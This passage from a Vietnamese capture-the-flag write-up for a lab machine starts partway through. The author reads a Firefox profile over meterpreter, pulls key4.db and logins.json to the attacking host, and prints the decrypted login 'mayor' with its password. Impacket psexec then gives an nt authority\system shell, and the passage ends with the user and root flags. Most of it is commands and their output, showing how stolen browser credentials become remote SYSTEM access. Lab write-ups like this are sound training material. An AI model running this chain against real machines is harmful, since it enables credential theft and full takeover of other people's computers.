100666/rw-rw-rw-  98304    fil   2020-04-22 04:02:15 +0700  webappsstore.sqlite
100666/rw-rw-rw-  140      fil   2020-05-15 09:45:02 +0700  xulstore.json
meterpreter > cd ljfn812a.default-release\\
meterpreter > cat logins.json 

Tìm thấy cả key4.dblogins.json. Tải cả hai tập tin này về máy của kẻ tấn công rồi sử dụng script để trích xuất mật khẩu:

globalSalt: b'2d45b7ac4e42209a23235ecf825c018e0382291d'
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'9e0554a19d22a773d0c5497efe7a80641fa25e2e73b2ddf3fbbca61d801c116d'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840. aes256-CBC
         OCTETSTRING b'b0da1db2992a21a74e7946f23021'
   OCTETSTRING b'a713739460522b20433f7d0b49bfabdb'
clearText b'70617373776f72642d636865636b0202'
password check? True
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'f1f75a319f519506d39986e15fe90ade00280879f00ae1e036422f001afc6267'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840. aes256-CBC
         OCTETSTRING b'dbd2424eabcf4be30180860055c8'
   OCTETSTRING b'22daf82df08cfd8aa7692b00721f870688749d57b09cb1965dde5c353589dd5d'
clearText b'86a15457f119f862f8296e4f2f6b97d9b6b6e9cb7a3204760808080808080808'
decrypting login/password pairs'mayor',b'8CL7O1N78MdrCIsV'

Cuối cùng, sử dụng thuộc Impacket để tạo CMD từ thông tin xác thực có được: gatekeeper/mayor:8CL7O1N78MdrCIsV@ cmd.exe
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file TSHQMftF.exe
[*] Opening SVCManager on
[*] Creating service vHfA on
[*] Starting service vHfA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32> whoami
nt authority\system

Lấy flag của root:

C:\Users\mayor\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 3ABE-D44B
 Directory of C:\Users\mayor\Desktop
05/14/2020  09:58 PM    <DIR>          .
05/14/2020  09:58 PM    <DIR>          ..
05/14/2020  09:21 PM                27 root.txt.txt
               1 File(s)             27 bytes
               2 Dir(s)  15,979,892,736 bytes free
C:\Users\mayor\Desktop> type root.txt.txt



User: {H4lf_W4y_Th3r3} Root: {Th3_M4y0r_C0ngr4tul4t3s_U}
